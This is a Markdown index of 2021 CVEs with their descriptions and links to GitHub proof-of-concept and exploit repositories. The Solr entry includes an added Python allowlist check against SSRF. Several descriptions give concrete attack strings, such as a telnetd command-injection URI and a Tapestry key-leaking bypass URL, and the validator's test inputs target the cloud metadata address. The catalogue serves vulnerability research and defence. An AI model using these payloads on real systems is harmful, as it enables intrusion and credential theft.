### CVE-2021-26868 (2021-03-11)

Windows Graphics Component Elevation of Privilege Vulnerability

- [KangD1W2/CVE-2021-26868](https://github.com/KangD1W2/CVE-2021-26868)

### CVE-2021-26871 (2021-03-11)

Windows WalletService Elevation of Privilege Vulnerability

- [fr4nkxixi/CVE-2021-26871_POC](https://github.com/fr4nkxixi/CVE-2021-26871_POC)

### CVE-2021-26882 (2021-03-11)

Remote Access API Elevation of Privilege Vulnerability

- [taiji-xo/CVE-2021-26882](https://github.com/taiji-xo/CVE-2021-26882)

### CVE-2021-26903 (2021-02-26)

LMA ISIDA Retriever 5.2 is vulnerable to XSS via query['text'].

- [Security-AVS/CVE-2021-26903](https://github.com/Security-AVS/CVE-2021-26903)

### CVE-2021-26904 (2021-02-26)

LMA ISIDA Retriever 5.2 allows SQL Injection.

- [Security-AVS/-CVE-2021-26904](https://github.com/Security-AVS/-CVE-2021-26904)

### CVE-2021-26943 (2021-03-31)

The UX360CA BIOS through 303 on ASUS laptops allows an attacker (with ring 0 privilege) to overwrite nearly arbitrary physical memory locations, including SMRAM, and execute arbitrary code in SMM (issue 3 of 3).

- [tandasat/SmmExploit](https://github.com/tandasat/SmmExploit)

### CVE-2021-27065 (2021-03-02)

Microsoft Exchange Server Remote Code Execution Vulnerability

- [adamrpostjr/cve-2021-27065](https://github.com/adamrpostjr/cve-2021-27065)

### CVE-2021-27180 (2021-04-14)

An issue was discovered in MDaemon before 20.0.4. There is Reflected XSS in Webmail (aka WorldClient). It can be exploited via a GET request. It allows performing any action with the privileges of the attacked user.

- [chudyPB/MDaemon-Advisories](https://github.com/chudyPB/MDaemon-Advisories)

### CVE-2021-27187 (2021-02-12)

The Sovremennye Delovye Tekhnologii FX Aggregator terminal client 1 stores authentication credentials in cleartext in login.sav when the Save Password box is checked.

- [jet-pentest/CVE-2021-27187](https://github.com/jet-pentest/CVE-2021-27187)

### CVE-2021-27188 (2021-02-12)

The Sovremennye Delovye Tekhnologii FX Aggregator terminal client 1 allows attackers to cause a denial of service (access suspended for five hours) by making five invalid login attempts to a victim's account.

- [jet-pentest/CVE-2021-27188](https://github.com/jet-pentest/CVE-2021-27188)

### CVE-2021-27190 (2021-02-12)

A Stored Cross-Site Scripting (XSS) vulnerability was discovered in PEEL SHOPPING 9.3.0 and 9.4.0, which are publicly available. User-supplied input containing a polyglot payload is echoed back inside JavaScript code in the HTML response. This allows an attacker to inject malicious JavaScript that can steal cookies, redirect users to other malicious websites, etc.

- [anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS](https://github.com/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS)

### CVE-2021-27198 (2021-02-26)

An issue was discovered in Visualware MyConnection Server before v11.1a. Unauthenticated Remote Code Execution can occur via Arbitrary File Upload in the web service when using a myspeed/sf?filename= URI. This application is written in Java and is thus cross-platform. The Windows installation runs as SYSTEM, which means that exploitation gives one Administrator privileges on the target system.

- [rwincey/CVE-2021-27198](https://github.com/rwincey/CVE-2021-27198)

### CVE-2021-27211 (2021-02-15)

steghide 0.5.1 relies on a certain 32-bit seed value, which makes it easier for attackers to detect hidden data.

- [b4shfire/stegcrack](https://github.com/b4shfire/stegcrack)

### CVE-2021-27246 (2021-04-14)

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Archer A7 AC1750 1.0.15 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of MAC addresses by the tdpServer endpoint. A crafted TCP message can write stack pointers to the stack. An attacker can leverage this vulnerability to execute code in the context of the root user. Was ZDI-CAN-12306.

- [synacktiv/CVE-2021-27246_Pwn2Own2020](https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020)

### CVE-2021-27328 (2021-02-19)

Yeastar NeoGate TG400 91.3.0.3 devices are affected by Directory Traversal. An authenticated user can decrypt firmware and can read sensitive information, such as a password or decryption key.

- [SQSamir/CVE-2021-27328](https://github.com/SQSamir/CVE-2021-27328)

### CVE-2021-27338 (2021-07-20)

Faraday Edge before 3.7 allows XSS via the network/create/ page and its network name parameter.

- [Pho03niX/CVE-2021-27338](https://github.com/Pho03niX/CVE-2021-27338)

### CVE-2021-27342 (2021-05-17)

An authentication brute-force protection mechanism bypass in telnetd in D-Link Router model DIR-842 firmware version 3.0.2 allows a remote attacker to circumvent the anti-brute-force cool-down delay period via a timing-based side-channel attack.

- [mavlevin/D-Link-CVE-2021-27342-exploit](https://github.com/mavlevin/D-Link-CVE-2021-27342-exploit)

### CVE-2021-27403 (2021-02-19)

Askey RTF8115VW BR_SV_g11.11_RTF_TEF001_V6.54_V014 devices allow cgi-bin/te_acceso_router.cgi curWebPage XSS.

- [bokanrb/CVE-2021-27403](https://github.com/bokanrb/CVE-2021-27403)

### CVE-2021-27404 (2021-02-19)

Askey RTF8115VW BR_SV_g11.11_RTF_TEF001_V6.54_V014 devices allow injection of a Host HTTP header.

- [bokanrb/CVE-2021-27404](https://github.com/bokanrb/CVE-2021-27404)

### CVE-2021-27513 (2021-02-21)

The module admin_ITSM in EyesOfNetwork 5.3-10 allows remote authenticated users to upload arbitrary .xml.php files because it relies on "le filtre userside."

- [ArianeBlow/CVE-2021-27513-CVE-2021-27514](https://github.com/ArianeBlow/CVE-2021-27513-CVE-2021-27514)
- [ArianeBlow/CVE-2021-27513](https://github.com/ArianeBlow/CVE-2021-27513)

### CVE-2021-27651 (2021-04-29)

In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.

- [samwcyo/CVE-2021-27651-PoC](https://github.com/samwcyo/CVE-2021-27651-PoC)
- [Vulnmachines/CVE-2021-27651](https://github.com/Vulnmachines/CVE-2021-27651)
- [orangmuda/CVE-2021-27651](https://github.com/orangmuda/CVE-2021-27651)

### CVE-2021-27850 (2021-04-15)

A critical unauthenticated remote code execution vulnerability was found in all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. An attacker was able to download the file `AppModule.class` by requesting the URL `http://localhost:8080/assets/something/services/AppModule.class`, which contains a HMAC secret key. The fix for that bug was a blacklist filter that checks if the URL ends with `.class`, `.properties` or `.xml`. Bypass: Unfortunately, the blacklist solution can simply be bypassed by appending a `/` at the end of the URL: `http://localhost:8080/assets/something/services/AppModule.class/`. The slash is stripped after the blacklist check and the file `AppModule.class` is loaded into the response. This class usually contains the HMAC secret key which is used to sign serialized Java objects. With the knowledge of that key an attacker can sign a Java gadget chain that leads to RCE (e.g. CommonsBeanUtils1 from ysoserial). Solution for this vulnerability: for Apache Tapestry 5.4.0 to 5.6.1, upgrade to 5.6.2 or later; for Apache Tapestry 5.7.0, upgrade to 5.7.1 or later.

- [kahla-sec/CVE-2021-27850_POC](https://github.com/kahla-sec/CVE-2021-27850_POC)
- [dorkerdevil/CVE-2021-27850_POC](https://github.com/dorkerdevil/CVE-2021-27850_POC)
- [Ovi3/CVE_2021_27850_POC](https://github.com/Ovi3/CVE_2021_27850_POC)
- [novysodope/CVE-2021-27850](https://github.com/novysodope/CVE-2021-27850)

### CVE-2021-27890 (2021-03-15)

SQL Injection vulnerability in MyBB before 1.8.26 via theme properties included in theme XML files.

- [xiaopan233/Mybb-XSS_SQL_RCE-POC](https://github.com/xiaopan233/Mybb-XSS_SQL_RCE-POC)

### CVE-2021-27905 (2021-04-13)

The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.

- [Henry4E36/Solr-SSRF](https://github.com/Henry4E36/Solr-SSRF)
- [W2Ning/Solr-SSRF](https://github.com/W2Ning/Solr-SSRF)
- [murataydemir/CVE-2021-27905](https://github.com/murataydemir/CVE-2021-27905)
- [pdelteil/CVE-2021-27905.POC](https://github.com/pdelteil/CVE-2021-27905.POC)
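The description says the fix is to validate `masterUrl`/`leaderUrl` against a configured set of permitted hosts, the way the `shards` parameter is already handled. The Python below is an added example of such a check for a caller-supplied replication URL; it is not Solr code. The allowlist hosts and the sample URLs are constructed, and the exact-`host:port` matching and rejection of userinfo are this example's design choices, not details the page gives.

```python
"""Allowlisting a caller-supplied replication URL, in the spirit of the
shards-style check that CVE-2021-27905's text says should apply to
masterUrl/leaderUrl. Added example, not Solr code; the allowlist and the
request values are constructed."""
from typing import FrozenSet, Optional
from urllib.parse import urlsplit

# Constructed allowlist of nodes this core may pull an index from.
ALLOWED_REPLICATION_HOSTS: FrozenSet[str] = frozenset(
    {"solr-1.internal:8983", "solr-2.internal:8983"}
)


def validate_master_url(master_url: str,
                        allowed_hosts: FrozenSet[str] = ALLOWED_REPLICATION_HOSTS
                        ) -> Optional[str]:
    """Return a normalised 'scheme://host:port/path' if the URL targets an
    allowed node, else None. Matching is on the exact host:port pair so a
    default-port or alternate-port variant of an allowed host is refused."""
    try:
        parts = urlsplit(master_url)
    except ValueError:
        return None
    if parts.scheme not in ("http", "https"):
        return None
    # 'http://allowed:8983@169.254.169.254/' parses the allowed name as
    # userinfo; refuse any URL that carries credentials or has no host.
    if parts.username is not None or parts.password is not None or not parts.hostname:
        return None
    try:
        port = parts.port            # raises ValueError on junk like ':abc'
    except ValueError:
        return None
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    hostport = f"{parts.hostname}:{port}"   # .hostname is already lower-cased
    if hostport not in allowed_hosts:
        return None
    return f"{parts.scheme}://{hostport}{parts.path or '/'}"


if __name__ == "__main__":
    for candidate in ("http://solr-1.internal:8983/solr/core1/replication",
                      "http://solr-1.internal:8983@169.254.169.254/latest/meta-data/",
                      "http://169.254.169.254/latest/meta-data/"):
        print(candidate, "->", validate_master_url(candidate))
```

Because the check runs on the parsed components rather than on the raw string, prefix tricks such as embedding an allowed hostname in the userinfo or path do not help an attacker reach an internal address.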

### CVE-2021-27928 (2021-03-19)

A remote code execution issue was discovered in MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL. An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd. NOTE: this does not affect an Oracle product.

- [Al1ex/CVE-2021-27928](https://github.com/Al1ex/CVE-2021-27928)
- [shamo0/CVE-2021-27928-POC](https://github.com/shamo0/CVE-2021-27928-POC)
- [LalieA/CVE-2021-27928](https://github.com/LalieA/CVE-2021-27928)

### CVE-2021-27963 (2021-03-05)

SonLogger before 6.4.1 is affected by user creation with any user permissions profile (e.g., SuperAdmin). An anonymous user can send a POST request to /User/saveUser without any authentication or session header.

- [erberkan/SonLogger-vulns](https://github.com/erberkan/SonLogger-vulns)

### CVE-2021-27965 (2021-03-05)

The MsIo64.sys driver before 1.1.19.1016 in MSI Dragon Center before 2.0.98.0 has a buffer overflow that allows privilege escalation via a crafted 0x80102040, 0x80102044, 0x80102050, or 0x80102054 IOCTL request.

- [mathisvickie/CVE-2021-27965](https://github.com/mathisvickie/CVE-2021-27965)
- [Jeromeyoung/CVE-2021-27965](https://github.com/Jeromeyoung/CVE-2021-27965)
- [fengjixuchui/CVE-2021-27965](https://github.com/fengjixuchui/CVE-2021-27965)

### CVE-2021-28079 (2021-04-26)

Jamovi <=1.6.18 is affected by a cross-site scripting (XSS) vulnerability. The column-name is vulnerable to XSS in the ElectronJS Framework. An attacker can make a .omv (Jamovi) document containing a payload. When opened by victim, the payload is triggered.

- [g33xter/CVE-2021-28079](https://github.com/g33xter/CVE-2021-28079)

### CVE-2021-28164 (2021-04-01)

In Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224, the default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. For example a request to /context/%2e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.

- [jammy0903/-jettyCVE-2021-28164-](https://github.com/jammy0903/-jettyCVE-2021-28164-)

### CVE-2021-28165 (2021-04-01)

In Eclipse Jetty 7.2.2 to 9.4.38, 10.0.0.alpha0 to 10.0.1, and 11.0.0.alpha0 to 11.0.1, CPU usage can reach 100% upon receiving a large invalid TLS frame.

- [uthrasri/CVE-2021-28165](https://github.com/uthrasri/CVE-2021-28165)
- [hshivhare67/Jetty_v9.4.31_CVE-2021-28165](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2021-28165)

### CVE-2021-28310 (2021-04-13)

Win32k Elevation of Privilege Vulnerability

- [Rafael-Svechinskaya/IOC_for_CVE-2021-28310](https://github.com/Rafael-Svechinskaya/IOC_for_CVE-2021-28310)

### CVE-2021-28312 (2021-04-13)

Windows NTFS Denial of Service Vulnerability

- [shubham0d/CVE-2021-28312](https://github.com/shubham0d/CVE-2021-28312)

### CVE-2021-28378 (2021-03-15)

Gitea 1.12.x and 1.13.x before 1.13.4 allows XSS via certain issue data in some situations.

- [pandatix/CVE-2021-28378](https://github.com/pandatix/CVE-2021-28378)

### CVE-2021-28476 (2021-05-11)

Windows Hyper-V Remote Code Execution Vulnerability

- [0vercl0k/CVE-2021-28476](https://github.com/0vercl0k/CVE-2021-28476)
- [bluefrostsecurity/CVE-2021-28476](https://github.com/bluefrostsecurity/CVE-2021-28476)
- [LaCeeKa/CVE-2021-28476-tools-env](https://github.com/LaCeeKa/CVE-2021-28476-tools-env)
- [australeo/CVE-2021-28476](https://github.com/australeo/CVE-2021-28476)
- [2273852279qqs/0vercl0k](https://github.com/2273852279qqs/0vercl0k)
- [dengyang123x/0vercl0k](https://github.com/dengyang123x/0vercl0k)

### CVE-2021-28480 (2021-04-13)

Microsoft Exchange Server Remote Code Execution Vulnerability

- [ZephrFish/CVE-2021-28480_HoneyPoC3](https://github.com/ZephrFish/CVE-2021-28480_HoneyPoC3)
- [Threonic/CVE-2021-28480](https://github.com/Threonic/CVE-2021-28480)

### CVE-2021-28482 (2021-04-13)

Microsoft Exchange Server Remote Code Execution Vulnerability

- [Shadow0ps/CVE-2021-28482-Exchange-POC](https://github.com/Shadow0ps/CVE-2021-28482-Exchange-POC)
- [KevinWorst/CVE-2021-28482_Exploit](https://github.com/KevinWorst/CVE-2021-28482_Exploit)

### CVE-2021-28663 (2021-05-10)

The Arm Mali GPU kernel driver allows privilege escalation or information disclosure because GPU memory operations are mishandled, leading to a use-after-free. This affects Bifrost r0p0 through r28p0 before r29p0, Valhall r19p0 through r28p0 before r29p0, and Midgard r4p0 through r30p0.

- [lntrx/CVE-2021-28663](https://github.com/lntrx/CVE-2021-28663)

### CVE-2021-29002 (2021-03-24)

A stored cross-site scripting (XSS) vulnerability in Plone CMS 5.2.3 exists in site-controlpanel via the "form.widgets.site_title" parameter.

- [miguelc49/CVE-2021-29002-1](https://github.com/miguelc49/CVE-2021-29002-1)

### CVE-2021-29003 (2021-04-13)

Genexis PLATINUM 4410 2.1 P4410-V2-1.28 devices allow remote attackers to execute arbitrary code via shell metacharacters to sys_config_valid.xgi, as demonstrated by the sys_config_valid.xgi?exeshell=%60telnetd%20%26%60 URI.

- [jaysharma786/CVE-2021-29003](https://github.com/jaysharma786/CVE-2021-29003)

### CVE-2021-29155 (2021-04-20)

An issue was discovered in the Linux kernel through 5.11.x. kernel/bpf/verifier.c performs undesirable out-of-bounds speculation on pointer arithmetic, leading to side-channel attacks that defeat Spectre mitigations and obtain sensitive information from kernel memory. Specifically, for sequences of pointer arithmetic operations, the pointer modification performed by the first operation is not correctly accounted for when restricting subsequent operations.

- [benschlueter/CVE-2021-29155](https://github.com/benschlueter/CVE-2021-29155)

### CVE-2021-29156 (2021-03-25)

ForgeRock OpenAM before 13.5.1 allows LDAP injection via the Webfinger protocol. For example, an unauthenticated attacker can perform character-by-character retrieval of password hashes, or retrieve a session token or a private key.

- [guidepointsecurity/CVE-2021-29156](https://github.com/guidepointsecurity/CVE-2021-29156)
- [5amu/CVE-2021-29156](https://github.com/5amu/CVE-2021-29156)

### CVE-2021-29200 (2021-04-27)

Apache OFBiz has unsafe deserialization prior to version 17.12.07. An unauthenticated user can perform an RCE attack.

- [freeide/CVE-2021-29200](https://github.com/freeide/CVE-2021-29200)

### CVE-2021-29267 (2021-03-29)

Sherlock SherlockIM through 2021-03-29 allows Cross Site Scripting (XSS) by leveraging the api/Files/Attachment URI to attack help-desk staff via the chatbot feature.

- [Security-AVS/CVE-2021-29267](https://github.com/Security-AVS/CVE-2021-29267)

### CVE-2021-29337 (2021-06-21)

MODAPI.sys in MSI Dragon Center 2.0.104.0 allows low-privileged users to access kernel memory and potentially escalate privileges via a crafted IOCTL 0x9c406104 call. This IOCTL provides the MmMapIoSpace feature for mapping physical memory.

- [rjt-gupta/CVE-2021-29337](https://github.com/rjt-gupta/CVE-2021-29337)

### CVE-2021-29349 (2021-03-31)

Mahara 20.10 is affected by Cross Site Request Forgery (CSRF) that allows a remote attacker to remove inbox-mail on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft a module/multirecipientnotification/inbox.php pieform_delete_all_notifications request, which leads to removing all messages from a mailbox.

- [0xBaz/CVE-2021-29349](https://github.com/0xBaz/CVE-2021-29349)
- [Vulnmachines/CVE-2021-29349](https://github.com/Vulnmachines/CVE-2021-29349)

### CVE-2021-29440 (2021-04-13)

Grav is a file based Web-platform. Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance. The issue was addressed in version 1.7.11.

- [CsEnox/CVE-2021-29440](https://github.com/CsEnox/CVE-2021-29440)

### CVE-2021-29441 (2021-04-27)

Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true) Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow any user to carry out any administrative tasks on the Nacos server.

- [hh-hunter/nacos-cve-2021-29441](https://github.com/hh-hunter/nacos-cve-2021-29441)
- [bysinks/CVE-2021-29441](https://github.com/bysinks/CVE-2021-29441)

### CVE-2021-29442 (2021-04-27)

Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (Derby DB), so this issue should not affect installations using external storage (e.g. MySQL).

- [VictorShem/QVD-2024-26473](https://github.com/VictorShem/QVD-2024-26473)

### CVE-2021-29447 (2021-04-15)

WordPress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires the WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.

- [motikan2010/CVE-2021-29447](https://github.com/motikan2010/CVE-2021-29447)
- [Vulnmachines/wordpress_cve-2021-29447](https://github.com/Vulnmachines/wordpress_cve-2021-29447)
- [dnr6419/CVE-2021-29447](https://github.com/dnr6419/CVE-2021-29447)
- [AssassinUKG/CVE-2021-29447](https://github.com/AssassinUKG/CVE-2021-29447)
- [b-abderrahmane/CVE-2021-29447-POC](https://github.com/b-abderrahmane/CVE-2021-29447-POC)
- [elf1337/blind-xxe-controller-CVE-2021-29447](https://github.com/elf1337/blind-xxe-controller-CVE-2021-29447)
- [Val-Resh/CVE-2021-29447-POC](https://github.com/Val-Resh/CVE-2021-29447-POC)
- [M3l0nPan/wordpress-cve-2021-29447](https://github.com/M3l0nPan/wordpress-cve-2021-29447)
- [mega8bit/exploit_cve-2021-29447](https://github.com/mega8bit/exploit_cve-2021-29447)
- [thomas-osgood/CVE-2021-29447](https://github.com/thomas-osgood/CVE-2021-29447)
- [Abdulazizalsewedy/CVE-2021-29447](https://github.com/Abdulazizalsewedy/CVE-2021-29447)
- [G01d3nW01f/CVE-2021-29447](https://github.com/G01d3nW01f/CVE-2021-29447)
- [viardant/CVE-2021-29447](https://github.com/viardant/CVE-2021-29447)
- [0xRar/CVE-2021-29447-PoC](https://github.com/0xRar/CVE-2021-29447-PoC)
- [andyhsu024/CVE-2021-29447](https://github.com/andyhsu024/CVE-2021-29447)

### CVE-2021-29505 (2021-05-28)

XStream is software for serializing Java objects to XML and back again. A vulnerability in XStream versions prior to 1.4.17 may allow a remote attacker who has sufficient rights to execute commands on the host only by manipulating the processed input stream. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected. The vulnerability is patched in version 1.4.17.

- [MyBlackManba/CVE-2021-29505](https://github.com/MyBlackManba/CVE-2021-29505)

### CVE-2021-29627 (2021-04-07)

In FreeBSD 13.0-STABLE before n245050, 12.2-STABLE before r369525, 13.0-RC4 before p0, and 12.2-RELEASE before p6, listening socket accept filters implementing the accf_create callback incorrectly freed a process supplied argument string. Additional operations on the socket can lead to a double free or use after free.

- [raymontag/cve-2021-29627](https://github.com/raymontag/cve-2021-29627)

### CVE-2021-30005 (2021-05-11)

In JetBrains PyCharm before 2020.3.4, local code execution was possible because of insufficient checks when getting the project from VCS.

- [atorralba/CVE-2021-30005-POC](https://github.com/atorralba/CVE-2021-30005-POC)

### CVE-2021-30109 (2021-04-05)

Froala Editor 3.2.6 is affected by Cross Site Scripting (XSS). Under certain conditions, a base64 crafted string leads to persistent Cross-site scripting (XSS) vulnerability within the hyperlink creation module.

- [Hackdwerg/CVE-2021-30109](https://github.com/Hackdwerg/CVE-2021-30109)

### CVE-2021-30128 (2021-04-27)

Apache OFBiz has unsafe deserialization prior to version 17.12.07.

- [LioTree/CVE-2021-30128-EXP](https://github.com/LioTree/CVE-2021-30128-EXP)

### CVE-2021-30146 (2021-04-06)

Seafile 7.0.5 (2019) allows Persistent XSS via the "share of library functionality."

- [Security-AVS/CVE-2021-30146](https://github.com/Security-AVS/CVE-2021-30146)

### CVE-2021-30357 (2021-06-08)

SSL Network Extender Client for Linux before build 800008302 reveals part of the contents of the configuration file supplied, which allows partially disclosing files to which the user did not have access.

- [joaovarelas/CVE-2021-30357_CheckPoint_SNX_VPN_PoC](https://github.com/joaovarelas/CVE-2021-30357_CheckPoint_SNX_VPN_PoC)

### CVE-2021-30461 (2021-05-29)

A remote code execution issue was discovered in the web UI of VoIPmonitor before 24.61. When the recheck option is used, the user-supplied SPOOLDIR value (which might contain PHP code) is injected into config/configuration.php.

- [daedalus/CVE-2021-30461](https://github.com/daedalus/CVE-2021-30461)
- [Vulnmachines/CVE-2021-30461](https://github.com/Vulnmachines/CVE-2021-30461)
- [Al1ex/CVE-2021-30461](https://github.com/Al1ex/CVE-2021-30461)
- [puckiestyle/CVE-2021-30461](https://github.com/puckiestyle/CVE-2021-30461)

### CVE-2021-30481 (2021-04-10)

Valve Steam through 2021-04-10, when a Source engine game is installed, allows remote authenticated users to execute arbitrary code because of a buffer overflow that occurs for a Steam invite after one click.

- [floesen/CVE-2021-30481](https://github.com/floesen/CVE-2021-30481)
- [JHVIW/jhviw.github.io](https://github.com/JHVIW/jhviw.github.io)

### CVE-2021-30551 (2021-06-15)

Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [xmzyshypnc/CVE-2021-30551](https://github.com/xmzyshypnc/CVE-2021-30551)

### CVE-2021-30573 (2021-08-03)

Use after free in GPU in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [s4e-io/CVE-2021-30573-PoC-Google-Chrome](https://github.com/s4e-io/CVE-2021-30573-PoC-Google-Chrome)
- [orangmuda/CVE-2021-30573](https://github.com/orangmuda/CVE-2021-30573)
- [kh4sh3i/CVE-2021-30573](https://github.com/kh4sh3i/CVE-2021-30573)

### CVE-2021-30632 (2021-10-08)

Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [Phuong39/PoC-CVE-2021-30632](https://github.com/Phuong39/PoC-CVE-2021-30632)
- [CrackerCat/CVE-2021-30632](https://github.com/CrackerCat/CVE-2021-30632)
- [maldev866/ChExp_CVE-2021-30632](https://github.com/maldev866/ChExp_CVE-2021-30632)
- [paulsery/CVE-2021-30632](https://github.com/paulsery/CVE-2021-30632)

### CVE-2021-30641 (2021-06-10)

Apache HTTP Server versions 2.4.39 to 2.4.46: unexpected matching behavior with 'MergeSlashes OFF'.

- [dja2TaqkGEEfA45/CVE-2021-30641](https://github.com/dja2TaqkGEEfA45/CVE-2021-30641)

### CVE-2021-30657 (2021-09-08)

A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.3, Security Update 2021-002 Catalina. A malicious application may bypass Gatekeeper checks. Apple is aware of a report that this issue may have been actively exploited.

- [shubham0d/CVE-2021-30657](https://github.com/shubham0d/CVE-2021-30657)

### CVE-2021-30682 (2021-09-08)

A logic issue was addressed with improved restrictions. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. A malicious application may be able to leak sensitive user information.

- [threatnix/csp-playground](https://github.com/threatnix/csp-playground)

### CVE-2021-30731 (2021-09-08)

This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-004 Catalina. An unprivileged application may be able to capture USB devices.

- [osy/WebcamViewer](https://github.com/osy/WebcamViewer)

### CVE-2021-30807 (2021-10-19)

A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Big Sur 11.5.1, iOS 14.7.1 and iPadOS 14.7.1, watchOS 7.6.1. An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

- [jsherman212/iomfb-exploit](https://github.com/jsherman212/iomfb-exploit)
- [30440r/gex](https://github.com/30440r/gex)

### CVE-2021-30858 (2021-08-24)

A use after free issue was addressed with improved memory management. This issue is fixed in iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

- [kmeps4/CVEREV3](https://github.com/kmeps4/CVEREV3)
- [Jeromeyoung/ps4_8.00_vuln_poc](https://github.com/Jeromeyoung/ps4_8.00_vuln_poc)

### CVE-2021-30860 (2021-08-24)

An integer overflow was addressed with improved input validation. This issue is fixed in Security Update 2021-005 Catalina, iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6, watchOS 7.6.2. Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

- [Levilutz/CVE-2021-30860](https://github.com/Levilutz/CVE-2021-30860)
- [jeffssh/CVE-2021-30860](https://github.com/jeffssh/CVE-2021-30860)

### CVE-2021-30937 (2021-08-24)

A memory corruption vulnerability was addressed with improved locking. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. A malicious application may be able to execute arbitrary code with kernel privileges.

- [realrodri/ExploiteameEsta](https://github.com/realrodri/ExploiteameEsta)

### CVE-2021-30955 (2021-08-24)

A race condition was addressed with improved state handling. This issue is fixed in macOS Monterey 12.1, watchOS 8.3, iOS 15.2 and iPadOS 15.2, tvOS 15.2. A malicious application may be able to execute arbitrary code with kernel privileges.

- [timb-machine-mirrors/jakeajames-CVE-2021-30955](https://github.com/timb-machine-mirrors/jakeajames-CVE-2021-30955)
- [nickorlow/CVE-2021-30955-POC](https://github.com/nickorlow/CVE-2021-30955-POC)
- [verygenericname/CVE-2021-30955-POC-IPA](https://github.com/verygenericname/CVE-2021-30955-POC-IPA)
- [b1n4r1b01/desc_race](https://github.com/b1n4r1b01/desc_race)
- [markie-dev/desc_race_A15](https://github.com/markie-dev/desc_race_A15)
- [Dylbin/desc_race](https://github.com/Dylbin/desc_race)
- [GeoSn0w/Pentagram-exploit-tester](https://github.com/GeoSn0w/Pentagram-exploit-tester)

### CVE-2021-30956 (2021-08-24)

A lock screen issue allowed access to contacts on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 15.2 and iPadOS 15.2. An attacker with physical access to a device may be able to see private contact information.

- [fordsham/CVE-2021-30956](https://github.com/fordsham/CVE-2021-30956)

### CVE-2021-31159 (2021-06-16)

Zoho ManageEngine ServiceDesk Plus MSP before 10519 is vulnerable to a User Enumeration bug due to improper error-message generation in the Forgot Password functionality, aka SDPMSP-15732.

- [ricardojoserf/CVE-2021-31159](https://github.com/ricardojoserf/CVE-2021-31159)

### CVE-2021-31166 (2021-05-11)

HTTP Protocol Stack Remote Code Execution Vulnerability

- [0vercl0k/CVE-2021-31166](https://github.com/0vercl0k/CVE-2021-31166)
- [zha0gongz1/CVE-2021-31166](https://github.com/zha0gongz1/CVE-2021-31166)
- [mvlnetdev/CVE-2021-31166-detection-rules](https://github.com/mvlnetdev/CVE-2021-31166-detection-rules)
- [corelight/CVE-2021-31166](https://github.com/corelight/CVE-2021-31166)
- [zecopro/CVE-2021-31166](https://github.com/zecopro/CVE-2021-31166)
- [bgsilvait/WIn-CVE-2021-31166](https://github.com/bgsilvait/WIn-CVE-2021-31166)
- [y0g3sh-99/CVE-2021-31166-Exploit](https://github.com/y0g3sh-99/CVE-2021-31166-Exploit)
